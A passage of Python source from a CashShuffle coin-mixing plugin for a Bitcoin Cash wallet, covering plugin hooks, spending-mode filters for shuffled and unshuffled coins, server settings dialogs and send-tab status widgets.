if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
continue
network_settings = Plugin.get_network_settings(window.config)
if not network_settings:
network_settings = self.settings_dialog(window, msg=_("Please choose a CashShuffle server"), restart_ask = False)
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
if not network_settings:
self.window_set_cashshuffle(window, False)
window.show_error(_("Can't get network, disabling CashShuffle."), parent=window)
return
self._delete_old_keys(window.wallet)
self._window_remove_from_disabled(window)
network_settings = copy.deepcopy(network_settings)
network_settings['host'] = network_settings.pop('server')
monkey_patches_apply(window)
self.windows.append(window)
self._increment_session_counter(window)
window.update_status()
window.utxo_list.update()
start_background_shuffling(window, network_settings, password=password)
return True
@hook
def utxo_list_item_setup(self, utxo_list, item, x, name):
my_custom_item_setup(utxo_list, item, x, name)
@hook
def utxo_list_context_menu_setup(self, utxo_list, menu, selected):
window = utxo_list.parent
if window in self.windows:
my_custom_utxo_context_menu_setup(window, utxo_list, menu, selected)
@hook
def history_list_filter(self, history_list, h_item, label):
# NB: 'h_item' might be None due to performance reasons
if self._hide_history_txs:
return bool(label.startswith("Shuffle ") # this string is not translated for performance reasons. _make_label also does not translate this string.
and ( any( x for x in BackgroundShufflingThread.SCALE_ARROWS
if x in label )
or BackgroundShufflingThread.SCALE_ARROW_UNKNOWN in label
)
)
return None
@hook
def history_list_context_menu_setup(self, history_list, menu, item, tx_hash):
# NB: We unconditionally create this menu if the plugin is loaded because
# it's possible for any wallet, even a watching-only wallet to have
# shuffle tx's with the correct labels (if the user uses labelsync or
# has imported labels).
menu.addSeparator()
def action_callback():
self._hide_history_txs = not self._hide_history_txs
Plugin.gui.config.set_key(ConfKeys.Global.HIDE_TXS_FROM_HISTORY, self._hide_history_txs, save=True)
action.setChecked(self._hide_history_txs)
if self._hide_history_txs:
tip = _("Shuffle transactions are now hidden")
else:
tip = _("Shuffle transactions are now shown")
QToolTip.showText(QCursor.pos(), tip, history_list)
history_list.update() # unconditionally update this history list as it may be embedded in the address_detail window and not a global history list..
for w in Plugin.gui.windows:
# Need to update all the other open windows.
# Note: We still miss any other open windows' address-detail
# history lists with this.. but that's ok as most of the
# time it won't be noticed by people and actually
# finding all those windows would just make this code
# less maintainable.
if history_list is not w.history_list: # check if not already updated above
w.history_list.update()
action = menu.addAction(_("Hide shuffle transactions"), action_callback)
action.setCheckable(True)
action.setChecked(self._hide_history_txs)
def on_close(self):
''' This is called on plugin unload/disable '''
self.del_network_dialog_tab()
PoolsWinMgr.killInstance()
for window in self.windows.copy():
self.on_close_window(window)
for window in self.disabled_windows.copy():
self.on_close_window(window)
if self.gui:
for window in self.gui.windows:
# lastly, we do this for ALL the extant wallet windows because all
# of their CashShuffle context menus attached to the cashshuffle
# status button need updating when the plugin is exited. Note
# that there may be windows in this set (incompatible windows)
# that aren't in either of the above 2 sets of windows.
window.update_status()
self.initted = False
Plugin.instance = None
self.print_error("Plugin closed")
assert len(self.windows) == 0 and len(self.disabled_windows) == 0, (self.windows, self.disabled_windows)
self._hide_history_txs_check()
def _hide_history_txs_check(self):
# The plugin was just opened or closed, so shuffle txs may now need to be shown or hidden; refresh the history lists to reflect that.
if self._hide_history_txs and Plugin.gui:
def refresh_history_lists(gui):
for w in gui.windows:
w.history_list.update()
QTimer.singleShot(250, lambda: refresh_history_lists(Plugin.gui))
@hook
def on_close_window(self, window):
def didRemove(window):
self.print_error("Window '{}' removed".format(window.wallet.basename()))
self.remove_button_from_window(window)
if self._window_remove_from_disabled(window):
didRemove(window)
return
if self._disable_for_window(window, add_to_disabled = False):
didRemove(window)
return
def _disable_for_window(self, window, add_to_disabled = True):
if window not in self.windows:
return
name = window.wallet.basename()
if window.background_process:
self.print_error("Joining background_process...")
window.background_process.join()
window.background_process.logger.disconnectAll(); window.background_process.logger.deleteLater()
window.background_process = None
self.print_error("Window '{}' closed, ended shuffling for its wallet".format(name))
self.windows.remove(window)
monkey_patches_remove(window)
window.utxo_list.update()
window.update_status()
self.print_error("Window '{}' disabled".format(name))
if add_to_disabled:
self._window_add_to_disabled(window)
else:
self._window_remove_from_disabled(window)
return True
def _window_add_to_disabled(self, window):
if window not in self.disabled_windows:
self._window_set_disabled_extra(window)
self.disabled_windows.append(window)
window.update_status() # ensure cashshuffle icon has the right menus, etc
return True
def _window_remove_from_disabled(self, window):
self._window_clear_disabled_extra(window)
if window in self.disabled_windows:
self.disabled_windows.remove(window)
return True
@hook
def on_new_password(self, window, old, new):
if getattr(window, 'background_process', None):
self.print_error("Got new password for wallet {} informing background process...".format(window.wallet.basename() if window.wallet else 'UNKNOWN'))
window.background_process.set_password(new)
@hook
def on_spend_coins(self, window, coins):
if (not coins or window not in self.windows
# the coin may not be "mine" if doing private key -> sweep
# in that case, just abort this as it doesn't matter what
# mode the send tab is in
or (window.tx_external_keypairs
and not window.wallet.is_mine(coins[0]['address']))):
return
extra = window.send_tab_shuffle_extra
spend_mode = extra.spendingMode()
is_shuffled = CoinUtils.is_coin_shuffled(window.wallet, coins[0]) # check coins[0]
if spend_mode == extra.SpendingModeShuffled and not is_shuffled:
# Coin is not shuffled, spend mode is Shuffled, force send tab to
# coin's mode
extra.setSpendingMode(extra.SpendingModeUnshuffled)
elif spend_mode == extra.SpendingModeUnshuffled and is_shuffled:
# Coin is shuffled, spend mode is UnShuffled, force send tab to
# coin's mode
extra.setSpendingMode(extra.SpendingModeShuffled)
@hook
def spendable_coin_filter(self, window, coins):
if not coins or window not in self.windows:
return
extra = window.send_tab_shuffle_extra
spend_mode = extra.spendingMode()
external_coin_addresses = set() # this is only ever used if they are doing a sweep. in which case we always allow the coins involved in the sweep
for pubkey in window.tx_external_keypairs:
a = Address.from_pubkey(pubkey)
external_coin_addresses.add(a)
if spend_mode == extra.SpendingModeShuffled:
# in Cash-Shuffle mode + shuffled spending we can ONLY spend shuffled coins + unshuffled living on a shuffled coin address
shuf_adrs_seen = set()
shuf_coins_seen = set()
for coin in coins.copy():
if coin['address'] in external_coin_addresses:
# completely bypass this filter for external keypair dict
# which is only used for sweep dialog in send tab
continue
is_shuf_adr = CoinUtils.is_shuffled_address(window.wallet, coin['address'])
if is_shuf_adr:
shuf_adrs_seen.add(coin['address'])
if (not CoinUtils.is_coin_shuffled(window.wallet, coin)
and not is_shuf_adr): # we allow coins sitting on a shuffled address to be "spent as shuffled"
coins.remove(coin)
else:
shuf_coins_seen.add(CoinUtils.get_name(coin))
# NEW! Force co-spending of other coins sitting on a shuffled address (Fix #3)
for adr in shuf_adrs_seen:
adr_coins = window.wallet.get_addr_utxo(adr)
for name, adr_coin in adr_coins.items():
if name not in shuf_coins_seen and not adr_coin['is_frozen_coin']:
coins.append(adr_coin)
shuf_coins_seen.add(name)
elif spend_mode == extra.SpendingModeUnshuffled:
# in Cash-Shuffle mode + unshuffled spending we can ONLY spend unshuffled coins (not sitting on a shuffled address)
for coin in coins.copy():
if ((CoinUtils.is_coin_shuffled(window.wallet, coin)
or is_coin_busy_shuffling(window, coin)
or CoinUtils.is_shuffled_address(window.wallet, coin['address']))
and coin['address'] not in external_coin_addresses):
coins.remove(coin)
@hook
def balance_label_extra(self, window):
if window not in self.windows:
return
shuf, unshuf, uprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(window.wallet)
totShuf, nShuf = shuf
# TODO: handle usas separately?
totShuf += usas[0]
nShuf += usas[1]
window.send_tab_shuffle_extra.refresh(shuf, unshuf, uprog, usas)
if nShuf:
return (_('Shuffled: {} {} in {} Coin'),
_('Shuffled: {} {} in {} Coins'))[0 if nShuf == 1 else 1].format(window.format_amount(totShuf).strip(), window.base_unit(), nShuf)
return None
@hook
def not_enough_funds_extra(self, window):
if window not in self.windows:
return
shuf, unshuf, uprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(window.wallet)
totShuf, nShuf, totUnshuf, nUnshuf, totInProg, nInProg = *shuf, *unshuf, *uprog
# TODO: handle usas separately?
totShuf += usas[0]
nShuf += usas[1]
extra = window.send_tab_shuffle_extra
extra.refresh(shuf, unshuf, uprog)
spend_mode = extra.spendingMode()
rets = []
if spend_mode == extra.SpendingModeShuffled:
if totUnshuf:
rets += [_("{} {} are unshuffled").format(window.format_amount(totUnshuf).strip(), window.base_unit())]
elif spend_mode == extra.SpendingModeUnshuffled:
if totShuf:
rets += [_("{} {} are shuffled").format(window.format_amount(totShuf).strip(), window.base_unit())]
if totInProg:
rets += [_("{} {} are busy shuffling").format(window.format_amount(totInProg).strip(), window.base_unit())]
return ') ('.join(rets) or None
@hook
def get_change_addrs(self, wallet):
for window in self.windows:
if wallet == window.wallet:
change_addrs = [wallet.cashshuffle_get_new_change_address()]
wallet.print_error("CashShuffle: reserving change address",change_addrs[0].to_ui_string())
return change_addrs
@hook
def do_clear(self, w):
for window in self.windows:
if w is window:
extra = getattr(w, 'send_tab_shuffle_extra', None)
if extra:
extra.do_clear()
return
def restart_all(self):
for window in self.windows:
bp = window.background_process
if bp:
password = bp.get_password()
network_settings = Plugin.get_network_settings(window.config)
if network_settings:
bp.join()
# kill the extant console logger as its existence can cause subtle bugs
bp.logger.disconnectAll(); bp.logger.deleteLater(); bp.logger = None
network_settings['host'] = network_settings.pop('server')
window.background_process = None; del bp
start_background_shuffling(window, network_settings, password=password)
window.print_error("CashShuffle restarted for wallet")
nd = Plugin.network_dialog
# force network settings tab to also refresh itself on restart to keep it in synch with other possible settings dialogs
if nd:
st = getattr(nd, "__shuffle_settings__", None)
if st: st.refreshFromSettings()
else:
window.print_error("ERROR: could not load network settings, FIXME!")
else:
window.print_error("WARNING: Window lacks a background_process, FIXME!")
def view_pools(self, window):
assert isinstance(window, ElectrumWindow), "view_pools must be passed an ElectrumWindow object! FIXME!"
settings = __class__.get_and_validate_network_settings(window.config)
if settings:
sdict = settings.copy()
sdict['name'] = "{}:{}".format(sdict['server'], sdict['info'])
PoolsWinMgr.show(sdict, settings, window.config, parent_window=window, modal=False)
else:
# this should not normally be reachable in the UI, which is why we don't i18n the error string.
window.show_error("CashShuffle is not properly set up -- no server defined! Please select a server from the settings.")
def restart_cashshuffle(self, window, msg = None, parent = None):
if (parent or window).question("{}{}".format(msg + "\n\n" if msg else "", _("Restart the CashShuffle plugin now?")),
app_modal=True):
self.restart_all()
window.notify(_("CashShuffle restarted"))
def settings_dialog(self, window, msg=None, restart_ask = True):
def window_parent(w):
# this is needed because WindowModalDialog overrides window.parent
if callable(w.parent): return w.parent()
return w.parent
while not isinstance(window, ElectrumWindow) and window and window_parent(window):
# MacOS fixups -- we can get into a situation where we are created without the ElectrumWindow being an immediate parent or grandparent
window = window_parent(window)
assert window and isinstance(window, ElectrumWindow)
d = SettingsDialog(title=_("CashShuffle Settings"), config=window.config, message=msg)
try:
server_ok = False
ns = None
while not server_ok:
if not d.exec_():
return
else:
ns = d.get_form()
server_ok = d.serverOk
if not server_ok:
server_ok = Plugin.show_bad_server_box()
if ns:
Plugin.save_network_settings(window.config, ns)
if restart_ask:
self.restart_cashshuffle(window, msg = _("CashShuffle must be restarted for the server change to take effect."))
return ns
finally:
d.deleteLater()
del d
@staticmethod
def show_bad_server_box():
return bool(QMessageBox.critical(None, _("Error"), _("Unable to connect to the specified server."), QMessageBox.Retry|QMessageBox.Ignore, QMessageBox.Retry) == QMessageBox.Ignore)
@staticmethod
def try_to_apply_network_dialog_settings(settings_tab):
ns = settings_tab.get_form()
if ns and (settings_tab.serverOk or Plugin.show_bad_server_box()):
Plugin.save_network_settings(settings_tab.config, ns) # save settings first.
gui = Plugin.gui
instance = Plugin.instance
window = None
# Next, try and get a wallet window to query user for plugin restart. If no window found, that's ok. Restart won't be necessary. :)
if instance and instance.windows:
# first try and get a window that actually has cashshuffle running, as that's only polite
window = instance.windows[-1]
elif instance and instance.disabled_windows:
# ok, no enabled windows -- next, get a window that is cashshuffle compatible, if any exist
window = instance.disabled_windows[-1]
elif gui and gui.windows:
# If that fails, get any old window...
window = gui.windows[-1]
# NB: if no window at this point, settings will take effect next time CashShuffle is enabled for a window
if window and instance:
# window will raise itself.
instance.restart_cashshuffle(window,
msg = _("CashShuffle must be restarted for the server change to take effect."),
parent = Plugin.network_dialog)
@staticmethod
def save_network_settings(config, network_settings):
ns = copy.deepcopy(network_settings)
print_error("Saving network settings: {}".format(ns))
config.set_key(ConfKeys.Global.SERVER, ns)
@staticmethod
def get_network_settings(config):
return copy.deepcopy(config.get(ConfKeys.Global.SERVER, None))
@staticmethod
def get_and_validate_network_settings(config):
selected = dict()
try:
# try and pre-populate from config
current = __class__.get_network_settings(config)
dummy = (current["server"], current["info"], current["ssl"]); del dummy;
selected = current
except (KeyError, TypeError):
pass
return selected
def settings_widget(self, window):
weakMeth = Weak(self.settings_dialog)
weakWindow = Weak(window)
return EnterButton(_('Settings'), lambda: weakMeth(weakWindow))
def requires_settings(self):
return True
def _delete_old_keys(self, config_or_wallet):
getter, setter, defuncts, thing = None, None, tuple(), None
if isinstance(config_or_wallet, SimpleConfig):
config = config_or_wallet
getter = lambda k: config.get(k)
setter = lambda k: config.set_key(k, None, save=True)
defuncts = ConfKeys.Global.DEFUNCT
thing = "config"
elif isinstance(config_or_wallet, Abstract_Wallet):
storage = config_or_wallet.storage
getter = lambda k: storage.get(k)
setter = lambda k: storage.put(k, None)
defuncts = ConfKeys.PerWallet.DEFUNCT
thing = "wallet.storage for {}".format(config_or_wallet.basename())
if thing:
ct = 0
for k in defuncts:
if getter(k) is not None:
ct += 1
setter(k)
if ct:
self.print_error("Found and removed {} deprecated keys from {}".format(ct, thing))
# counters: shuffle counter and session counter
@classmethod
def _increment_generic_counter(cls, window, key):
window.wallet.storage.put(key, cls._get_generic_counter(window, key) + 1)
@staticmethod
def _get_generic_counter(window, key):
try:
ctr = int(window.wallet.storage.get(key, 0))
except (ValueError, TypeError): # paranoia
# stored value must have not been an int. :(
ctr = 0
return ctr
@classmethod
def _increment_session_counter(cls, window):
cls._increment_generic_counter(window, ConfKeys.PerWallet.SESSION_COUNTER)
@classmethod
def _get_session_counter(cls, window):
return cls._get_generic_counter(window, ConfKeys.PerWallet.SESSION_COUNTER)
@classmethod
def _increment_shuffle_counter(cls, window):
cls._increment_generic_counter(window, ConfKeys.PerWallet.SHUFFLE_COUNTER)
@classmethod
def _get_shuffle_counter(cls, window):
return cls._get_generic_counter(window, ConfKeys.PerWallet.SHUFFLE_COUNTER)
# /counters
def warn_if_shuffle_disable_not_ok(self, window, *, msg=None):
'''
Determine if disabling (or not re-enabling in the case of a pw dialog
cancel) of cash shuffle is ok for this wallet.
This method may block the GUI with a local modal dialog asking the user
if they are sure.
In the future, we may also put code to say "shuffles pending, please
wait..." in a cancellable progress-type dialog.
Returns True if calling code should proceed with disable action.
'''
# Note -- window may not necessarily be shuffle patched as this
# may be called from the password dialog
noprompt = window.wallet.storage.get(ConfKeys.PerWallet.DISABLE_NAGGER_NOPROMPT, False)
if not noprompt and type(self)._get_session_counter(window) > 0:
if msg is None:
msg = _('You are now <i>disabling</i> CashShuffle for this wallet. Are you sure?')
ans, chk = window.question(
msg=msg,
informative_text=_('Spending and linking coins with CashShuffle disabled may compromise your privacy for both shuffled and unshuffled coins in this wallet.'),
title=_("Privacy Warning"), rich_text=True,
checkbox_text=_("Never ask for this wallet"), checkbox_ischecked=noprompt,
)
if chk:
window.wallet.storage.put(ConfKeys.PerWallet.DISABLE_NAGGER_NOPROMPT, bool(chk))
return bool(ans)
return True
class SendTabExtraDisabled(QFrame, PrintError):
''' Implements a Widget that appears in the main_window 'send tab' to inform the user CashShuffle was disabled for this wallet '''
def __init__(self, window):
self.send_tab = window.send_tab
self.send_grid = window.send_grid
self.wallet = window.wallet
self.window = window
super().__init__(window.send_tab)
self.send_grid.addWidget(self, 0, 0, 1, self.send_grid.columnCount()) # just our luck. row 0 is free!
self.setup()
def setup(self):
self.setFrameStyle(QFrame.StyledPanel|QFrame.Sunken)
l = QGridLayout(self)
l.setVerticalSpacing(6)
l.setHorizontalSpacing(30)
l.setContentsMargins(6, 6, 6, 6)
self.txt = "<big><b>{}</b></big> {}".format(_("CashShuffle Disabled"), _("Your shuffled and unshuffled coins can be mixed and spent together."))
self.msg = "{}\n\n{}\n\n{}".format(_("When CashShuffle is disabled, your privacy on the blockchain is reduced to traditional levels, and 'chainalysis' becomes easier (your transactions can be associated with one another)."),
_("This spending mode is the same as previous versions of Oregano, which did not offer CashShuffle."),
_("You may toggle CashShuffle back on at any time using the 'CashShuffle' icon in the status bar."))
self.titleLabel = HelpLabel(self.txt, self.msg)
self.titleLabel.setParent(self)
l.addWidget(self.titleLabel, 0, 1, 1, 4)
l.setAlignment(self.titleLabel, Qt.AlignLeft|Qt.AlignVCenter)
l.addItem(QSpacerItem(1, 1, QSizePolicy.MinimumExpanding, QSizePolicy.Fixed), 1, 5)
icon = FixedAspectRatioSvgWidget(75, ":icons/CashShuffleLogos/logo-vertical_grayed.svg")
icon.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
icon.setToolTip(_("CashShuffle Disabled"))
l.addWidget(icon, 0, 0, l.rowCount(), 1)
l.setSizeConstraint(QLayout.SetNoConstraint)
class SendTabExtra(QFrame, PrintError):
''' Implements a Widget that appears in the main_window 'send tab' to inform the user of shuffled coin status & totals '''
needRefreshSignal = pyqtSignal() # protocol thread uses this signal to tell us that amounts have changed
needWalletSaveSignal = pyqtSignal() # protocol thread uses this signal to tell us that the wallet should be saved to disk using storage.write
pixmap_cached = None # singleton gets initialized first time an instance of this class is constructed. Contains the cashshuffle_icon5.png scaled to 125px width
def __init__(self, window):
self.send_tab = window.send_tab
self.send_grid = window.send_grid
self.wallet = window.wallet
self.window = window
super().__init__(window.send_tab)
self.send_grid.addWidget(self, 0, 0, 1, self.send_grid.columnCount()) # just our luck. row 0 is free!
self.setup()
def setup(self):
self.setFrameStyle(QFrame.StyledPanel|QFrame.Sunken)
l = QGridLayout(self)
l.setVerticalSpacing(6)
l.setHorizontalSpacing(30)
l.setContentsMargins(6, 12, 6, 12)
self.msg = "{}\n\n{}\n\n{}".format(_("For improved privacy, shuffled coins and unshuffled coins cannot be sent together in the same transaction when CashShuffle is enabled."),
_("You may switch between shuffled and unshuffled spending using the radio buttons on the right."),
_("If insufficient shuffled funds are available, you can wait a few minutes as coins are shuffled in the background."))
self.msg2 = "{}\n\n{}\n\n{}".format(_("For improved privacy, shuffled coins and unshuffled coins cannot be sent together in the same transaction when CashShuffle is enabled."),
_("You may switch between shuffled and unshuffled spending using the radio buttons on the right."),
_("Some of your unshuffled funds may be temporarily locked while the shuffle operation is performed. If you want to unlock these funds immediately, you can use the 'Pause Shuffling' button to do so."))
self.titleLabel = HelpLabel("", "") # Will be initialized by self.onSpendRadio() below
self.titleLabel.setParent(self)
l.addWidget(self.titleLabel, 0, 1, 1, 4)
self.spendButtons = QButtonGroup(self)
# Shuffled
self.shufLabel = HelpLabel(_("Shuffled available:"), self.msg)
m = _("Shuffled (private) funds")
self.shufLabel.setToolTip(m)
self.shufLabel.setParent(self)
l.addWidget(self.shufLabel, 1, 1)
self.amountLabel = QLabel("", self); self.amountLabel.setToolTip(m)
l.addWidget(self.amountLabel, 1, 2)
self.numCoinsLabel = QLabel("", self); self.numCoinsLabel.setToolTip(m)
l.addWidget(self.numCoinsLabel, 1, 3)
self.spendShuffled = QRadioButton(_("Spend Shuffled"), self); self.spendShuffled.setToolTip(_("Spend only your shuffled (private) coins"))
l.addWidget(self.spendShuffled, 1, 4)
self.spendButtons.addButton(self.spendShuffled)
# Unshuffled
self.unshufLabel = HelpLabel(_("Unshuffled available:"), self.msg2)
m = _("Funds that are not yet shuffled")
self.unshufLabel.setToolTip(m)
self.unshufLabel.setParent(self)
l.addWidget(self.unshufLabel, 2, 1)
self.amountLabelUnshuf = QLabel("", self); self.amountLabelUnshuf.setToolTip(m)
l.addWidget(self.amountLabelUnshuf, 2, 2)
self.numCoinsLabelUnshuf = QLabel("", self); self.numCoinsLabelUnshuf.setToolTip(m)
l.addWidget(self.numCoinsLabelUnshuf, 2, 3)
self.spendUnshuffled = QRadioButton(_("Spend Unshuffled"), self); self.spendUnshuffled.setToolTip(_("Spend only your unshuffled coins"))
l.addWidget(self.spendUnshuffled, 2, 4)
self.spendButtons.addButton(self.spendUnshuffled)
self.spendShuffled.setChecked(True)
# In Progress
self.msg3 = _("Funds that are busy being shuffled are not available for spending until they are shuffled. To spend these funds immediately, use the 'Pause Shuffling' button to temporarily suspend CashShuffle.")
self.busyLbl = HelpLabel(_("Busy shuffling:"), self.msg3)
self.busyLbl.setParent(self)
m = _("Funds currently being shuffled")
self.busyLbl.setToolTip(m)
l.addWidget(self.busyLbl, 3, 1)
self.amountLabelBusy = QLabel("", self); self.amountLabelBusy.setToolTip(m)
l.addWidget(self.amountLabelBusy, 3, 2)
self.numCoinsLabelBusy = QLabel("", self); self.numCoinsLabelBusy.setToolTip(m)
l.addWidget(self.numCoinsLabelBusy, 3, 3)
self.pauseBut = QPushButton("", self) # Button text filled in by refresh() call
self.pauseBut.setDefault(False); self.pauseBut.setAutoDefault(False); self.pauseBut.setCheckable(True)
self.pauseBut.setToolTip(_("Pause/Unpause the background shuffle process (frees up 'busy' coins for spending)"))
l.addWidget(self.pauseBut, 3, 4)
l.setAlignment(self.titleLabel, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabel, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabelUnshuf, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabelBusy, Qt.AlignLeft)
l.addItem(QSpacerItem(1, 1, QSizePolicy.MinimumExpanding, QSizePolicy.Fixed), 1, 5)
icon = FixedAspectRatioSvgWidget(125, ":icons/CashShuffleLogos/logo-vertical.svg")
icon.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
l.addWidget(icon, 0, 0, l.rowCount(), 1)
l.setSizeConstraint(QLayout.SetNoConstraint)
self.spendButtons.buttonClicked.connect(self.onSpendRadio)
self.window.history_updated_signal.connect(self.refresh)
self.needRefreshSignal.connect(self.refresh)
self.needRefreshSignal.connect(self.window.update_fee)
self.needWalletSaveSignal.connect(self.wallet.storage.write)
self.spendButtons.buttonClicked.connect(lambda x="ignored": self.refresh())
self.pauseBut.clicked.connect(self.onClickedPause)
self.onSpendRadio() # sets up the title label and possibly warns user if starting up in "spend unshuffled" mode
def onSpendRadio(self, ignored = None):
which = self.spendingMode()
if which == self.SpendingModeShuffled:
self.titleLabel.setText("<big><b>{}</b></big> ({})"
.format(_("CashShuffle Enabled"), _("Only <b>shuffled</b> funds will be sent")))
self.titleLabel.help_text = self.msg
self.forceUnpause()
#self.pauseBut.setDisabled(True)
elif which == self.SpendingModeUnshuffled:
self.titleLabel.setText("<big><b>{}</b></big> ({})"
.format(_("CashShuffle Enabled"), _("Only <i>unshuffled</i> funds will be sent")))
self.titleLabel.help_text = self.msg2
#self.pauseBut.setEnabled(bool(self.window.background_process and not self.window.background_process.is_offline_mode()))
noprompt = self.wallet.storage.get(ConfKeys.PerWallet.SPEND_UNSHUFFLED_NAGGER_NOPROMPT, False)
if not noprompt:
ans, chk = self.window.question(
msg=_('You are now spending <b><i>unshuffled</i></b> coins. Are you sure?'),
informative_text=_('Spending and linking these coins may compromise your privacy not only for new received coins, but also for your past spending of shuffled coins.'),
title=_("Privacy Warning"), rich_text=True,
checkbox_text=_("Never ask for this wallet"), checkbox_ischecked=noprompt,
)
if chk:
self.wallet.storage.put(ConfKeys.PerWallet.SPEND_UNSHUFFLED_NAGGER_NOPROMPT, bool(chk))
if not ans:
self.spendShuffled.animateClick()
return
self.window.update_fee()
def onClickedPause(self, b):
if self.window.background_process:
self.window.background_process.set_paused(b)
# Note: the GUI refresh() will later also set this string, but we set it immediately here so the UI feels peppier
self.pauseBut.setText(_("Pause Shuffling") if not b else _("Shuffling Paused"))
self.window.utxo_list.update()
def do_clear(self): # called by plugin hook do_clear()
self.forceUnpause()
self.refresh()
def forceUnpause(self):
if self.window.background_process:
self.window.background_process.set_paused(False)
self.pauseBut.setChecked(False)
self.pauseBut.setText(_("Pause Shuffling"))
def showEvent(self, e):
super().showEvent(e)
self.refresh()
_templates = tuple()
@rate_limited(0.250)
def refresh(self, shuf=None, unshuf=None, inprog=None, usas=None):
if not hasattr(self.window.wallet, '_shuffle_patched_'):
# this can happen if this timer fires after the wallet was "un-monkey-patched". It's the price we pay for @rate_limited. :)
return
if shuf is None or unshuf is None or inprog is None or usas is None:
shuf, unshuf, inprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(self.window.wallet)
amount, n, amountUnshuf, nUnshuf, amountInProg, nInProg = *shuf, *unshuf, *inprog
amount += usas[0]
n += usas[1]
# TODO: handle usas separately?
if not __class__._templates: # lazy init
__class__._templates = (
# bold [0]
( # [0] is singular [1] is plural
( "<b>{}</b> {}", ("<b>{}</b> %s <small>(%s)</small>"%(_("Coin"),_("UTXO"))) ),
( "<b>{}</b> {}", ("<b>{}</b> %s <small>(%s)</small>"%(_("Coins"),_("UTXOs"))) )
),
# normal [1]
( #[0] singular, [1] plural
( "{} {}", ("{} %s <small>(%s)</small>"%(_("Coin"),_("UTXO"))) ), # normal singular
( "{} {}", ("{} %s <small>(%s)</small>"%(_("Coins"),_("UTXOs"))) ) # normal text plural template
)
)
bt = self._templates[0] # bold text templates (sub-list [0]==singular [1]==plural)
nt = self._templates[1] # normal text templates (sub-list [0]==singular [1]==plural)
mode = self.spendingMode()
tshuf = (bt if mode == self.SpendingModeShuffled else nt)[0 if n == 1 else 1] # select a template based on mode & plurality
tunshuf = (bt if mode == self.SpendingModeUnshuffled else nt)[0 if nUnshuf == 1 else 1] # select a template based on mode
self.amountLabel.setText(tshuf[0].format(self.window.format_amount(amount).strip(), self.window.base_unit()))
self.numCoinsLabel.setText(tshuf[1].format(n))
self.amountLabelUnshuf.setText(tunshuf[0].format(self.window.format_amount(amountUnshuf).strip(), self.window.base_unit()))
self.numCoinsLabelUnshuf.setText(tunshuf[1].format(nUnshuf))
tbusy = nt[0 if nInProg == 1 else 1]
self.amountLabelBusy.setText(tbusy[0].format(self.window.format_amount(amountInProg).strip(), self.window.base_unit()))
self.numCoinsLabelBusy.setText(tbusy[1].format(nInProg))
f = self.spendShuffled.font()
f.setBold(bool(mode == self.SpendingModeShuffled))
self.spendShuffled.setFont(f)
f = self.spendUnshuffled.font()
f.setBold(bool(mode == self.SpendingModeUnshuffled))
self.spendUnshuffled.setFont(f)
if self.window.background_process:
is_paused = self.window.background_process.get_paused()
self.pauseBut.setChecked(is_paused)
else:
self.pauseBut.setChecked(False)
self.pauseBut.setText(_("Pause Shuffling") if not self.pauseBut.isChecked() else _("Shuffling Paused"))
self.pauseBut.setEnabled(bool(self.window.background_process #and mode == self.SpendingModeUnshuffled
and not self.window.background_process.is_offline_mode()))
SpendingModeShuffled = 1
SpendingModeUnshuffled = 2
SpendingModeUnknown = 0
def spendingMode(self):
''' Returns one of the SpendingMode* class constants above '''
if hasattr(self.wallet, "_shuffle_patched_"):
which = self.spendButtons.checkedButton()
if which is self.spendShuffled: return self.SpendingModeShuffled
elif which is self.spendUnshuffled: return self.SpendingModeUnshuffled
return self.SpendingModeUnknown
def setSpendingMode(self, spendMode):
but2Check = None
if spendMode == self.SpendingModeUnshuffled and not self.spendUnshuffled.isChecked():
but2Check = self.spendUnshuffled
elif spendMode == self.SpendingModeShuffled and not self.spendShuffled.isChecked():
but2Check = self.spendShuffled
if but2Check:
but2Check.setChecked(True)
self.onSpendRadio() # the slot won't get called when setting radio buttons programmatically, so we force-call it
class NetworkCheckerDelegateMixin:
'''Abstract base for classes receiving data from the NetworkChecker.
SettingsDialog implements this, as does the PoolsWindow.'''
settingsChanged = pyqtSignal(dict)
statusChanged = pyqtSignal(dict)
class SettingsDialogMixin(NetworkCheckerDelegateMixin, PrintError):
''' Abstract base class -- do not instantiate this as it will raise errors
because the pyqtSignal cannot be bound to a non-QObject.
Instead, use SettingsDialog and/or SettingsTab, which inherit from this and
are proper QObject subclasses.
Also call __init__ on the QObject/QWidget first before calling this
class's __init__ method.'''
# from base: settingsChanged = pyqtSignal(dict)
# from base: statusChanged = pyqtSignal(dict)
formChanged = pyqtSignal()
_DEFAULT_HOST_SUBSTR = "shuffle.servo.cash" # on fresh install, prefer this server as default (substring match)
def __init__(self, config, message=None):
assert config
assert isinstance(self, QWidget)
self.config = config
self.networkChecker = None
self.serverOk = None
self._vpLastStatus = dict()
self.setup(message)
#DEBUG
destroyed_print_error(self)
def showEvent(self, e):
super().showEvent(e)
self.startNetworkChecker()
def hideEvent(self, e):
super().hideEvent(e)
self.stopNetworkChecker()
def closeEvent(self, e):
super().closeEvent(e)
def from_combobox(self):
d = self.cb.currentData()
if isinstance(d, dict):
host, info, ssl = d.get('server'), d.get('info'), d.get('ssl')
self.le.setText(host)
self.sb.setValue(info)
self.chk.setChecked(ssl)
en = self.cb.currentIndex() == self.cb.count()-1
self.le.setEnabled(en); self.sb.setEnabled(en); self.chk.setEnabled(en)
self.formChanged.emit()
def get_form(self):
ret = {
'server': self.le.text(),
'info' : self.sb.value(),
'ssl' : self.chk.isChecked()
}
if self.isVisible():
customIdx = self.cb.count()-1
if self.cb.currentIndex() == customIdx:
# "remember" what they typed into the custom area..
d = self.cb.itemData(customIdx)
if ret != d:
self.cb.setItemData(customIdx, ret)
return ret
def setup_combo_box(self, selected = {}):
def load_servers(fname):
r = {}
try:
zips = __file__.find(".zip")
if zips == -1:
with open(os.path.join(os.path.dirname(__file__), fname), 'r') as f:
r = json.loads(f.read())
else:
from zipfile import ZipFile
zip_file = ZipFile(__file__[: zips + 4])
with zip_file.open("shuffle/" + fname) as f:
r = json.loads(f.read().decode())
except:
